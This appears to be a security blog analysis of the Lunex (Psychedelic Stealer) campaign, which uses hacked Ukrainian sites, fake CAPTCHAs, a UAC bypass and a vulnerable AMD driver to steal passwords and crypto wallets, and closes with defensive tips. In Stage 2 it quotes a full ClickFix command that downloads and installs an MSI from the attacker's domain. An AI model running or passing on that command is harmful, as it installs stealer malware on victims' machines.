How the Lunex platform steals passwords and crypto wallets and gains remote access through hacked Ukrainian sites and a vulnerable AMD driver. Breakdown and defense.
Introduction
Researchers from Ontinue uncovered a new, technically sophisticated campaign aimed directly at Ukrainian-speaking users. The attackers hack perfectly legitimate Ukrainian websites, embed a fake Cloudflare verification in them, and trick visitors into running a malicious program themselves. The end goal is the Lunex stealer (also known as Psychedelic Stealer), which steals browser passwords, crypto wallets, and — most dangerously — opens a hidden remote-access channel to the victim's files.
What makes this attack unique is the use of the Bring Your Own Vulnerable Driver (BYOVD) technique: the malicious loader exploits a vulnerable AMD Radeon Software driver to "blind" antivirus and EDR without killing their processes. We break down the full attack chain, the technical details, and the ways to protect yourself.
What Lunex and Psychedelic Stealer are
Lunex is a malware-as-a-service (MaaS) platform: the developers sell or rent a ready-made data-theft toolkit to other cybercriminals. The final payload delivered to a victim's computer is called Psychedelic Stealer by researchers (executable psychedeliclove.exe), while Lunex is the name of the platform itself and its management infrastructure.
The name Lunex first appeared in cybersecurity literature in June 2026, when researcher Luke Wilkinson of BlueTeamCoolTeam discovered six active command-and-control (C2) panels in the US, Finland, Germany, the Netherlands, and Ukraine. Later, Ontinue counted 28 panels across 13 countries. That growth is a typical sign of a commercial MaaS platform gaining clients among different criminal groups.
The current campaign was first documented by Arctic Wolf Labs (September 24, 2026), who called it Psychedelic Stealer, and the full technical breakdown of the attack chain was published by researcher Rhys Downing of Ontinue (September 25, 2026).
Why is the MaaS model dangerous? It dramatically lowers the entry barrier for criminals. A cybercriminal no longer needs to know how to write malware — it's enough to rent a ready panel, buy traffic, and launch a campaign. That is why Lunex's infrastructure grew from six panels to 28 across 13 countries in two to three months: it's a scaling business, and every new platform "client" means new waves of attacks, including against Ukrainian users.
How the attack chain works: four stages
The attack consists of four sequential stages and begins with a seemingly innocent user action.
Stage 1 — a hacked site and a fake CAPTCHA. Attackers hack legitimate small-business Ukrainian websites and inject an iframe element with a fake Cloudflare verification page. Among the compromised resources are sites of a hair-treatment clinic, a scale-model manufacturer, a specialized bookstore, a psychology center, a tool shop, and a car retailer.
Stage 2 — the ClickFix technique. The fake CAPTCHA tells the user to "pass the check": it copies a command like msiexec.exe /i https://uasputnik.com/elita.msi /passive to the clipboard and, in Ukrainian, instructs them to paste it into the Run dialog (Win+R). This is the essence of ClickFix — the victim runs the malicious installer themselves, bypassing browser warnings.
ClickFix's effectiveness is explained by psychology: a user who has gotten used to automatic "I'm not a robot" checks on real sites sees nothing suspicious in a similar image. And since the command runs through Windows' own Run dialog rather than a file download, the antivirus doesn't receive a classic "malicious file" at the initial stage — only an msiexec command, which is itself a legitimate system tool. That's why this technique has recently become one of the most common malware-delivery vectors.
Stage 3 — LunexLoader and UAC bypass. The MSI installer (files named miks.msi and sova.msi were also observed) installs the LunexLoader. It bypasses Windows User Account Control (UAC) by abusing the CMSTPLUA COM object — a well-known "fileless" privilege-escalation technique that requires no additional binaries.
Stage 4 — blinding the defense and loading the stealer. With elevated privileges, LunexLoader performs the BYOVD attack, loads the vulnerable AMD driver, disables security monitoring, and then downloads and runs the main Psychedelic Stealer payload.
The BYOVD technique: a vulnerable AMD driver as a defense-blinding tool
The most interesting part of the attack is Bring Your Own Vulnerable Driver. The attacker doesn't look for a vulnerability in the victim's system — they bring one with them: they load a legitimate but vulnerable, vendor-signed driver.
Lunex uses the PDFWKRNL.sys driver — a component of AMD Radeon Software that runs in kernel mode. The driver contains vulnerability CVE-2023-20598 (CVSS 7.8, CWE-269 — improper privilege management). It allows an authorized caller to send an IOCTL request and obtain arbitrary read/write to physical memory and I/O ports.
Using this driver, the attacker doesn't kill antivirus or EDR processes but "blinds" them by tampering with the kernel callbacks responsible for monitoring. The protection processes keep running but effectively see nothing. This approach can bypass even the Microsoft Vulnerable Driver Blocklist and Windows HVCI.
It's worth emphasizing why this is a rare and notable technique. BYOVD is traditionally used in the final stages of attacks — to disable defense before launching ransomware or another "heavy" payload. Here, the vulnerable driver is used as an intermediate step that prepares the ground for an ordinary infostealer. This shows the growing technical maturity of stealer operators: they now borrow methods previously characteristic of more serious, targeted groups.
Tellingly, the PDFWKRNL.sys driver was added to the public LOLDrivers catalog back in March 2026, yet its presence in the catalog didn't stop the malware from loading it — a typical reminder that proactive protection can't be replaced by signatures alone.
What the attacker steals: browsers and crypto wallets
After the defense is blinded, the stealer collects data from six Chromium-based browsers: Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, and Vivaldi. It extracts saved passwords, session cookies, and autofill data.
A separate focus is cryptocurrency. Lunex targets nine wallets:
- desktop: Bitcoin Core, Litecoin Core, Exodus, Atomic Wallet, Electrum;
- browser extensions: MetaMask, OKX Wallet, SafePal (plus the legacy MetaMask version).
Wallet extensions are identified by known IDs, making the search fast and accurate. For the victim, the loss can be critical: unlike a bank card, cryptocurrency transactions are practically irreversible.
Hidden persistence: a "second door" inside the browser
Lunex doesn't stop at a one-time theft. To stay in the system, it creates three independent persistence mechanisms at once:
- An autostart Registry Run key.
- A hidden scheduled task named psychedelicloveUtils that runs at logon.
- A malicious Native Messaging Host in Chrome with the identifier com.lunex.explorer.
The third point is especially dangerous. Native Messaging Host is a legitimate mechanism that lets browser extensions communicate with programs on the computer. Lunex registers its own host, which runs on an embedded PowerShell script about 13,200 bytes in size. This is effectively a full backdoor inside the browser process: the operator can browse drives, read arbitrary files in 512 KB blocks (up to 524 MB at a time), write and upload files, and execute code — without installing a separate C2 implant. Additionally, the malware modifies Chrome settings to grant its extension broad access to cookies, history, bookmarks, and tabs.
The campaign's scale: numbers and geography
Arctic Wolf Labs recorded a wave of attacks from September 9 to 14, 2026: 557 lure views, 426 CAPTCHA clicks, and 79 successful installations across 32 countries. Tellingly, 446 of the 557 views came from Ukraine — the campaign is deliberately aimed at the Ukrainian audience.
The infrastructure is growing fast. If six C2 panels were known in June 2026, by late September Ontinue counted 28 panels across 13 countries, including the US, UK, Netherlands, France, Germany, Turkey, and Bangladesh. One panel served five different phishing domains, showing the platform expanding beyond simple data theft — into phishing and brand impersonation.
Ontinue researchers note signs that the platform's developers are Russian-speaking. The domain uasputnik.com, which served the lure page and distributed the MSI installer, was registered specifically for the campaign.
How to protect yourself: practical tips
Lunex's technical sophistication doesn't mean protection is impossible. The key point: the attack starts with social engineering, not a vulnerability in your system.
1. Never run commands from browser "checks." No legitimate site will ask you to paste a command into Win+R or a terminal to "prove you're human." Cloudflare and similar services work automatically and don't require users to run programs.
2. Check whether your data is already compromised. If you suspect you may have been a victim, check your accounts via the cyberpeople.tech breach-check service and immediately change passwords, starting with email and banking.
3. Enable two-factor authentication on all important accounts — email, crypto exchanges, social networks. Even if a password is stolen, MFA makes it far harder for an attacker to get in.
4. Keep your system updated. Although this attack uses an old AMD driver, regular Windows, browser, and driver updates close other vectors used by similar stealers.
5. Use a password manager and unique passwords. Stealers extract exactly the passwords saved in the browser. A separate password manager with a protected vault reduces the impact of theft.
6. Be careful with browser-extension wallets. Keep significant amounts in hardware (cold) wallets rather than browser extensions, which are the main target of such stealers.
7. Improve your cyber literacy. ClickFix and fake CAPTCHA techniques are becoming more common. Basic phishing-recognition skills are the most effective defense. Useful learning materials are on the cyberpeople.tech education page.
Conclusion
The Lunex campaign is an alarm signal for the Ukrainian segment of the internet. Attackers have deliberately targeted Ukrainian-speaking users, using hacked Ukrainian sites, native language in instructions, and a technically complex chain exploiting a vulnerable AMD driver.
The main lesson is simple: even the most advanced technical attack begins with one careless user click. No legitimate "security check" will ever ask you to run a command manually. Stay alert, update systems, enable MFA — and regularly check your data for breaches.